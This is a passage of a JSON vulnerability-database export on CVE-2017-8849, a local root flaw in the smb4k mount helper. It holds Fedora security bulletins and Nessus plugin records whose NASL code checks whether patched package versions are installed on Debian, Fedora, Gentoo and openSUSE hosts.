"FEDORA:E6C176051745", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: smb4k-1.2.2-3.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suit e to access the SMB/CIFS shares of the local network neighborhood. Its purpose i s to provide a program that's easy to use and has as many features as possible. ", "modified": "2017-06-09T19:38:34", "published": "2017-06-09T19:38:34", "id": "FEDORA:EA4816048681", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: smb4k-1.2.2-3.fc26", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suit e to access the SMB/CIFS shares of the local network neighborhood. Its purpose i s to provide a program that's easy to use and has as many features as possible. ", "modified": "2017-05-22T06:52:26", "published": "2017-05-22T06:52:26", "id": "FEDORA:8DC72601E838", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: smb4k-1.2.2-3.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:38:24", "description": "Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper\nbinary does not properly verify the mount command it is being asked to\nrun.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n'Stretch'.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-26T00:00:00", "title": "Debian DLA-1002-1 : smb4k security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-06-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:smb4k"], "id": "DEBIAN_DLA-1002.NASL", "href": "https://www.tenable.com/plugins/nessus/101033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1002-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101033);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n\n script_name(english:\"Debian DLA-1002-1 : smb4k security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper\nbinary does not properly verify the mount command it is being asked to\nrun.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n'Stretch'.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00031.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/smb4k\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected smb4k package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"smb4k\", reference:\"1.2.1-2~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:15:07", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : smb4k (2017-f7849e04f4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:smb4k", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F7849E04F4.NASL", "href": "https://www.tenable.com/plugins/nessus/101747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f7849e04f4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101747);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-f7849e04f4\");\n\n script_name(english:\"Fedora 26 : smb4k (2017-f7849e04f4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f7849e04f4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"smb4k-1.2.2-3.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:50", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "title": "Fedora 24 : smb4k (2017-aceb424894)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:smb4k", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-ACEB424894.NASL", "href": "https://www.tenable.com/plugins/nessus/100334", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-aceb424894.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100334);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-aceb424894\");\n\n script_name(english:\"Fedora 24 : smb4k (2017-aceb424894)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-aceb424894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"smb4k-1.2.2-3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:43", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-22T00:00:00", "title": "Fedora 25 : smb4k (2017-2cc18e2b3b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:smb4k"], "id": "FEDORA_2017-2CC18E2B3B.NASL", "href": "https://www.tenable.com/plugins/nessus/100308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-2cc18e2b3b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100308);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-2cc18e2b3b\");\n\n script_name(english:\"Fedora 25 : smb4k (2017-2cc18e2b3b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-2cc18e2b3b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"smb4k-1.2.2-3.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:06:03", "description": "The remote host is affected by the vulnerability described in GLSA-201705-14\n(Smb4K: Arbitrary command execution as root)\n\n Smb4k contains a logic flaw in which mount helper binary does not\n properly verify the mount command it is being asked to run.\n \nImpact :\n\n A local user can execute commands with the root privilege due to the\n mount helper being installed as suid.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "GLSA-201705-14 : Smb4K: Arbitrary command execution as root", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:smb4k"], "id": "GENTOO_GLSA-201705-14.NASL", "href": "https://www.tenable.com/plugins/nessus/100446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201705-14.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100446);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"GLSA\", value:\"201705-14\");\n\n script_name(english:\"GLSA-201705-14 : Smb4K: Arbitrary command execution as root\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201705-14\n(Smb4K: Arbitrary command execution as root)\n\n Smb4k contains a logic flaw in which mount helper binary does not\n properly verify the mount command it is being asked to run.\n \nImpact :\n\n A local user can execute commands with the root privilege due to the\n mount helper being installed as suid.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201705-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Smb4K users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/smb4k-1.2.3-r1:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/smb4k\", unaffected:make_list(\"ge 1.2.3-r1\"), vulnerable:make_list(\"lt 1.2.3-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Smb4K\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:51", "description": "This update for smb4k fixes the following issues :\n\n - Disabled dbus service and polkit rules, because this\n version of smb4k has a local root exploit issue\n (boo#1036245, CVE-2017-8849). Automatic mounting will no\n longer be possible to work around this security issue.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-19T00:00:00", "title": "openSUSE Security Update : smb4k (openSUSE-2017-595)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:smb4k-debugsource", "p-cpe:/a:novell:opensuse:smb4k", "p-cpe:/a:novell:opensuse:smb4k-lang", "p-cpe:/a:novell:opensuse:smb4k-debuginfo", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-595.NASL", "href": "https://www.tenable.com/plugins/nessus/100286", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100286);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-8849\");\n\n script_name(english:\"openSUSE Security Update : smb4k (openSUSE-2017-595)\");\n script_summary(english:\"Check for the openSUSE-2017-595 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for smb4k fixes the following issues :\n\n - Disabled dbus service and polkit rules, because this\n version of smb4k has a local root exploit issue\n (boo#1036245, CVE-2017-8849). Automatic mounting will no\n longer be possible to work around this security issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036245\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected smb4k packages.\"\n );\n 